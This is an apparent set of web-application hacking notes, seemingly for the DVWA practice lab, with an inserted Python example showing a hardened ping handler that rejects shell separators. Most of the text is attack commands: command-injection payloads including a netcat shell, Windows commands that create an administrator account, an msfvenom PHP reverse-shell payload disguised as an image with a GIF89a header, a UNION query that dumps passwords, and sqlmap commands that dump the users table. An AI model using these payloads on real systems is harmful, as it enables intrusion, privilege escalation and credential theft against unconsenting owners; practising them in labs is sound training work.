Hacking Web Applications and Web Servers
Command Execution
Linux
127.0.0.1 && ls
127.0.0.1 & ls
127.0.0.1 ; ls
127.0.0.1 | ls
- with space
127.0.0.1 |ls
- without space
127.0.0.1 && nc -c sh 127.0.0.1 9001
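Added example, not part of the original notes: why the separators above work against a handler that builds a shell string, and a hardened handler that rejects every one of them. It assumes the input field feeds a ping command, which the page does not state; all function names are hypothetical.

```python
import ipaddress
import shlex
import subprocess

# Inputs listed under "Command Execution > Linux" on this page.
PAGE_PAYLOADS = [
    "127.0.0.1 && ls",
    "127.0.0.1 & ls",
    "127.0.0.1 ; ls",
    "127.0.0.1 | ls",
    "127.0.0.1 |ls",
]

def vulnerable_command(target):
    """The 'before': input concatenated into a string handed to a shell."""
    return "ping -c 1 " + target

def shell_operators(command_line):
    """Control operators a POSIX shell would act on in command_line."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return [tok for tok in lexer if set(tok) <= set("();<>|&")]

def parse_target(target):
    """Accept only a literal IPv4/IPv6 address; ValueError otherwise."""
    return str(ipaddress.ip_address(target.strip()))

def safe_argv(target):
    """The 'after': validated address passed as one argv element, no shell."""
    return ["ping", "-c", "1", parse_target(target)]

def ping(target):
    # shell=False is the default: no shell ever parses the input.
    return subprocess.run(safe_argv(target), capture_output=True,
                          text=True, timeout=5, check=False)

if __name__ == "__main__":
    for payload in PAGE_PAYLOADS + ["127.0.0.1"]:
        ops = shell_operators(vulnerable_command(payload))
        try:
            verdict = "accepted " + str(safe_argv(payload))
        except ValueError:
            verdict = "rejected"
        print(f"{payload!r}: shell operators {ops}; hardened handler: {verdict}")
```

Allow-listing the value as an IP address and passing it as a single argv element removes the shell from the path entirely, so no separator needs to be blacklisted.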
Windows
hostname
whoami
tasklist
taskkill /PID 3112 /F
- forcefully kills the processes
dir c:\
net user
net user test /add
- add a new user
net localgroup Administrators test /add
- add test user to administrators
net user test
- details of the user
dir c:\"pin.txt"
type c:\"pin.txt"
Brute-Forcing
File Upload
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php
exploit.php.img
GIF89a;
- add this line to any file to make it appear as an image file
use multi/handler
SQL Injection
Manual
1' UNION SELECT user, password FROM users#
Sqlmap
sqlmap -r req.txt --batch
sqlmap -r req.txt --batch --level=5 --risk=3
sqlmap -r req.txt --batch --level=5 --risk=3 --current-db
sqlmap -r req.txt -D dvwa --tables
sqlmap -r req.txt -D dvwa -T users --columns
sqlmap -r req.txt -D dvwa -T users --dump